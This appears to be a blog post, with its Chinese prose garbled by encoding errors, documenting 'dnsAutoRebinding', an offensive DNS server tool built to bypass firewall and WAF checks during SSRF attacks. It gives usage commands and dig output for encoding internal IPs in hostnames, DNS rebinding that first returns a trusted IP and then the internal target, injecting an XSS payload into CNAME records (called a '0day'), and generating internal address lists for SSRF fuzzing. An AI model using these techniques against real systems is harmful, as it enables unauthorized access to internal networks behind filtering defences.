I"Ç<h1 id="dns-auto-rebinding">Dns Auto Rebinding</h1>
<p class="date">25 Jun 2017 - Tr3jer_CongRong</p>

<p>Â Â Â Â Â Â ssrfæ—¶éš¾å…ä¼šè¢«é˜²ç«å¢™æ‹¦æˆªæ¶æ„è¿”å›å€¼ï¼Œä½¿ç”¨è¿‡xip.ioä½†æ•ˆæœä¸€èˆ¬ã€‚é¡¹ç›®åœ°å€ï¼š
<a target="_blank" href="https://github.com/Tr3jer/dnsAutoRebinding">Github</a></p>

<p>Â Â Â Â Â Â ssrfã€ssrfå†…ç½‘åœ°å€fuzzã€dnsäºŒæ¬¡rebindingã€æ”¯æŒipv4/ipv6ã€æ”¯æŒipåœ°å€è½¬æ¢ç ã€dnsè®°å½•æ±¡æŸ“(æ–‡æœ«ä¸€ä¸ª0dayä¸ºä¾‹)ã€‚è„‘å›¾åœ¨è„‘å­é‡Œï¼Œæ‡’å¾—ç”»äº†ã€‚</p>

<p>support Record Type and Encodingï¼š</p>

<pre><code>MX = ipv4/ipv6/hex
A = ipv4/en/int/hex
AAAA = ipv6/int/hex
CNAME = ipv4/ipv6/hex
</code></pre>

<p>é…ç½®ç›‘å¬æœåŠ¡å™¨example.comï¼š</p>

<table>
  <thead>
    <tr>
      <th>record type</th>
      <th>record</th>
      <th>record value</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>A</td>
      <td>ns</td>
      <td>server ip</td>
    </tr>
    <tr>
      <td>NS</td>
      <td>test</td>
      <td>ns.example.com</td>
    </tr>
  </tbody>
</table>

<blockquote>
  <p>sudo pip install ipaddr</p>
</blockquote>

<p>ä¿®æ”¹lib/config.confï¼š
maindomain = test.example.com.
æ³¨æ„æ ¹åœ°å€.è¦åŠ </p>

<pre><code>Usage: sudo python main.py {Options}

Options:
  -h, --help            show this help message and exit
  -t 300, --TTL=300     ttl value , 0 By Default
  -y A/AAAA/CNAME/MX, --Type=A/AAAA/CNAME/MX
                        Record Type , A By Default
  -e int/hex/en, --Encoding=int/hex/en
                        Record Encoding , None By Default
  -r, --Rebinding       The Second Time Query Return Target Ip
  -p "&lt;script&gt;alert(/xss/)&lt;/script&gt;", --payload="&lt;script&gt;alert(/xss/)&lt;/script&gt;"
                        Specified Record , Support CNAME/MX

</code></pre>

<p>-yé€‰é¡¹æŒ‡å®šä»¥ä»€ä¹ˆè®°å½•ç±»å‹è¿”å›ï¼š</p>

<p><code>-y A/AAAA/CNAME/MX, --Type=A/AAAA/CNAME/MX Record Type , A By Default</code></p>

<p>-té€‰é¡¹æŒ‡å®šTTLå€¼ï¼š</p>

<p><code>-t 300, --TTL=300     ttl value , 0 By Default</code></p>

<p>ç›´æ¥Aè®°å½•è¿”å›ipv4åœ°å€ï¼š</p>

<p><code>sudo ./main.py</code></p>

<pre><code>âœ  ~ dig 192.168.1.1.test.example.com

; &lt;&lt;&gt;&gt; DiG 9.8.3-P1 &lt;&lt;&gt;&gt; 192.168.1.1.test.example.com
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 50359
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;192.168.1.1.test.example.com.	IN	A

;; ANSWER SECTION:
192.168.1.1.test.example.com. 0	IN	A	192.168.1.1

;; AUTHORITY SECTION:
test.example.com.		227	IN	NS	ns.example.com.
</code></pre>

<p>server:
<code>[21:54:16] client ip:44486 =&gt; A =&gt; 192.168.1.1.test.example.com.</code></p>

<p>hexç¼–ç ï¼š</p>

<p><code>sudo ./main.py -e hex</code></p>

<pre><code>âœ  ~ dig 31302e302e302e31.test.example.com

; &lt;&lt;&gt;&gt; DiG 9.8.3-P1 &lt;&lt;&gt;&gt; 31302e302e302e31.test.example.com
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 1585
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;31302e302e302e31.test.example.com.	IN	A

;; ANSWER SECTION:
31302e302e302e31.test.example.com. 0 IN	A	10.0.0.1

;; AUTHORITY SECTION:
test.example.com.		600	IN	NS	ns.example.com.
</code></pre>

<p>server:
<code>[22:00:42] client ip:30150 =&gt; A =&gt; 31302e302e302e31.test.example.com.</code></p>

<p>intç¼–ç ï¼š</p>

<p><code>sudo ./main.py -e int</code></p>

<pre><code>âœ  ~ dig 3232235777.test.example.com

; &lt;&lt;&gt;&gt; DiG 9.8.3-P1 &lt;&lt;&gt;&gt; 3232235777.test.example.com
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 18066
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;3232235777.test.example.com.	IN	A

;; ANSWER SECTION:
3232235777.test.example.com. 0	IN	A	192.168.1.1

;; AUTHORITY SECTION:
test.example.com.		456	IN	NS	ns.example.com.
</code></pre>

<p>server:
<code>[22:03:00] client ip:5240 =&gt; A =&gt; 3232235777.test.example.com.</code></p>

<p>Â Â Â Â Â Â å› ä¸ºwafä¼šè¯†åˆ«å‡ºå†…ç½‘åœ°å€æ‰ç”¨çš„ä¸Šæœ¬é¡¹ç›®ï¼Œé‚£ä¹ˆwafå¤§å¯è¯†åˆ«è¿›åˆ¶è½¬æ¢è¿™ç§ï¼Œæ‰€ä»¥è¦è‡ªå·±å†™ä¸ªåœ°å€è½¬æ¢æ–¹æ³•ï¼š</p>

<p>num to en:</p>

<pre><code>./lib/common.py 192.168.1.1

1. Single IP Covert For En
2. Build IP List
[+] [1 By Default/2]
bjckbgikbkb
</code></pre>

<p><code>sudo ./main.py -e en</code></p>

<pre><code>âœ  ~ dig bjckbgikbkb.test.example.com

; &lt;&lt;&gt;&gt; DiG 9.8.3-P1 &lt;&lt;&gt;&gt; bjckbgikbkb.test.example.com
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 5115
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;bjckbgikbkb.test.example.com.	IN	A

;; ANSWER SECTION:
bjckbgikbkb.test.example.com. 0	IN	A	192.168.1.1

;; AUTHORITY SECTION:
test.example.com.		20	IN	NS	ns.example.com.
</code></pre>

<p>server:
<code>[22:10:22] client ip:8434 =&gt; A =&gt; bjckbgikbkb.test.example.com.</code></p>

<p>dnsäºŒæ¬¡rebinding:</p>
<pre><code>sudo ./main.py -r
Input Safe Ip? [Address/Req By Default]8.8.8.8
</code></pre>
<p>Â Â Â Â Â Â é€‰æ‹©æ€§è¾“å…¥ç›®æ ‡ä¿¡ä»»çš„åœ°å€ï¼Œæ¯”å¦‚åœ¨ssrfæ—¶é˜²ç«å¢™åœ¨éªŒè¯dnsè¿”å›å€¼æ˜¯å¦å­˜åœ¨äºç™½åå•ã€‚é»˜è®¤ä¸ºå‘èµ·è¯·æ±‚çš„åœ°å€ã€‚(è®°å¾—ç‰¹æ®Šæƒ…å†µéœ€è¦æŒ‡å®šè®°å½•ç±»å‹)</p>

<p>ç¬¬ä¸€æ¬¡ï¼š</p>

<pre><code>âœ  ~ dig 192.168.1.1.test.example.com

; &lt;&lt;&gt;&gt; DiG 9.8.3-P1 &lt;&lt;&gt;&gt; 192.168.1.1.test.example.com
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 59544
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;192.168.1.1.test.example.com.	IN	A

;; ANSWER SECTION:
192.168.1.1.test.example.com. 0	IN	A	8.8.8.8

;; AUTHORITY SECTION:
test.example.com.		461	IN	NS	ns.example.com.
</code></pre>

<p>ç¬¬äºŒæ¬¡ï¼š</p>

<pre><code>âœ  ~ dig 192.168.1.1.test.example.com

; &lt;&lt;&gt;&gt; DiG 9.8.3-P1 &lt;&lt;&gt;&gt; 192.168.1.1.test.example.com
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 45312
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;192.168.1.1.test.example.com.	IN	A

;; ANSWER SECTION:
192.168.1.1.test.example.com. 0	IN	A	192.168.1.1

;; AUTHORITY SECTION:
test.example.com.		501	IN	NS	ns.example.com.
</code></pre>

<p>dnsè®°å½•æ±¡æŸ“ï¼š</p>

<p><code>sudo ./main.py -p "&lt;script&gt;alert(/xss/)&lt;/script&gt;" -y CNAME</code></p>

<pre><code>âœ  ~ dig test.example.com

; &lt;&lt;&gt;&gt; DiG 9.8.3-P1 &lt;&lt;&gt;&gt; test.example.com
;; global options: +cmd
;; Got answer:
;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 5073
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;test.example.com.			IN	A

;; ANSWER SECTION:
test.example.com.		0	IN	CNAME	&lt;script&gt;alert\(/xss/\)&lt;/script&gt;test.example.com.
</code></pre>

<p><img src="https://blog-1252048719.cos.ap-shanghai.myqcloud.com/0day.png" alt="" /></p>

<p>Â Â Â Â Â Â è¿™ä¸ªæ€ä¹ˆç©å–å†³äºä½ çš„å°è„‘è¢‹ç“œçš„è„‘å›è·¯äº†ã€‚å¦‚æœé˜²ç«å¢™è¿˜è¦éªŒè¯æ˜¯å¦ä¸ºä¿¡ä»»åœ°å€çš„è¯ä¿®æ”¹lib/common.pyï¼š</p>

<pre><code>elif payload != 'None' and payload.find(mainDomain) == -1:
    record = payload + "ä¿¡ä»»åœ°å€."
</code></pre>

<p>ipListBuild:
æ‰¹é‡ç”Ÿæˆç½‘æ®µåœ°å€ï¼Œé€‰æ‹©æ€§ç¼–ç ï¼Œé€‚åˆssrfå†…ç½‘åœ°å€fuzzã€‚</p>

<pre><code>python lib/common.py 192.168.1.1

1. Single IP Covert For En
2. Build IP List
[+] [1 By Default/2]2
[+] Please Input Segment Length [24 By Default]
[+] Please Input Encoding ['ipv4' By Default]hex
[+] Please Input Server Root Address [test.example.com By Default]
[+] Stored in the 20170625223912_test_example_com_hex.txt
[root@VM_34_252_centos dnsAutoRebinding]# head -n 5 20170625223912_test_example_com_hex.txt
3139322e3136382e312e31.test.example.com
3139322e3136382e312e32.test.example.com
3139322e3136382e312e33.test.example.com
3139322e3136382e312e34.test.example.com
3139322e3136382e312e35.test.example.com
</code></pre>

:ET